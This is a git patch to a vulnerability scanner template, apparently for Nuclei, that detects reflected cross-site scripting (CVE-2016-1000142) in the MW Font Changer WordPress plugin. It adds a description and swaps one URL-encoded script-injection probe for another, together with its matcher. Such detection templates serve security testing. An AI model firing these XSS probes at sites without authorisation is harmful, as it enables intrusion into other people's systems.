From a725b8e0e5489bcf9e5b2778ab398d482dedd478 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 17 Sep 2021 15:13:45 +0530
Subject: [PATCH] Update CVE-2016-1000142.yaml

---
 cves/2016/CVE-2016-1000142.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml
index b8a8b5e263..392b427d0d 100644
--- a/cves/2016/CVE-2016-1000142.yaml
+++ b/cves/2016/CVE-2016-1000142.yaml
@@ -4,7 +4,8 @@ info:
   name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
   author: daffainfo
   severity: medium
-  reference: |
+  description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+  reference:
     - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
     - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
   tags: cve,cve2016,wordpress,wp-plugin,xss
@@ -12,13 +13,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
+      - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '"><script>alert(document.domain);</script><"'
+          - '</script><script>alert(document.domain)</script>'
         part: body
 
       - type: word